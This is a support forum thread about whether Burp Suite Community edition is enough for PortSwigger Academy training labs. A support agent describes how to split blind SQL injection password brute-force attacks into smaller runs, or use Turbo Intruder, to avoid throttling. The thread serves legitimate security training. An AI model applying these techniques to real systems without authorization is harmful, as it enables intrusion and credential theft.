Burp Suite User Forum

Login to post

Do I need Burp Professional license to take Portswigger Academy course?

Samuel | Last updated: Jun 21, 2022 05:07AM UTC

Hi, I have a doubt. Does Burp Suite get better performance to solve Portswigger Academy labs ? I've been taking the Portswigger Academy (using burp suite community license), but some of the labs take too long to complete. For instance, the SQL Injection part, I've been trying Cluster Bomb attacks and the brute force tests take too long. I'm not sure if in order to get the most from the Portswigger academy course, I should already have a Burp Suite Professional license. Thanks again.

Ben, PortSwigger Agent | Last updated: Jun 21, 2022 07:27AM UTC

Hi Samuel, All but a small handful of labs are solvable using the free Burp Community edition (there are a small number of labs that require the use of the Burp Collaborator, which is only available within Burp Professional). For some of the labs that require the use of Intruder you may have to split your attack up into smaller subsets in order to get round the request throttling that occurs within Intruder in Burp Community. What are the specific names of the lab(s) you are having issues with?

Samuel | Last updated: Jun 22, 2022 05:13PM UTC

Hi Ben, thanks for your response. Specifically, the SQL injection labs (Blind SQL, Enumerating Database). I was replicating some of the methodologies explained by Rana Khalil using cluster bomb, but it take years for me to finish the brute force tests.

Ben, PortSwigger Agent | Last updated: Jun 23, 2022 10:45AM UTC

Hi Samuel, You probably have two options - Breaking up your attacks into smaller subsets is really going to be the only way to improve things for you if you want to use native Intruder. Alternatively, you could look to use the Turbo Intruder extension which does not contain any request throttling. If we take the 'Blind SQL injection with conditional responses' as an example (sounds like this might be the type of lab you are having issues with) - rather than running a attack that cycles through a-z and 0-9 for each of the 20 characters in the password, you could split the attack up so that you perform an attack on the first 3 characters of the password, then a second attack that does the same for characters 4,5 and 6 etc. This approach is not quite as automated as using an unthrottled Intruder in Burp Professional but it should still be manageable if you want to stick with Intruder.

You need to Log in to post a reply. Or register here, for free.